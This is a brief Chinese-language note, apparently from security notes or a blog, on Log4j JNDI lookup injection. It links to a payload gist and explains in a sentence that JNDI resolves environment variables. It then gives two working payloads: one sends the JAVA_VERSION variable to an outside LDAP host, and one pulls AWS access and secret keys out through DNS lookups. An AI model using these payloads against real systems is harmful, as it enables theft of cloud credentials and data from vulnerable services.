相关payload：https://gist.github.com/am1ru1/275af8ab41b12d72b94bd18ba779c51b

信息泄露：

jndi可以解析环境变量，如下所示，所以可以造成相关信息泄露

${jndi:ldap://secruitycompassadvisory.com/version=${env:JAVA_VERSION}}

还可以利用dns把数据带出去

${jndi:dns:// ${env:AWS_ACCESS_KEY}. ${env:AWS_SECRET_KEY}}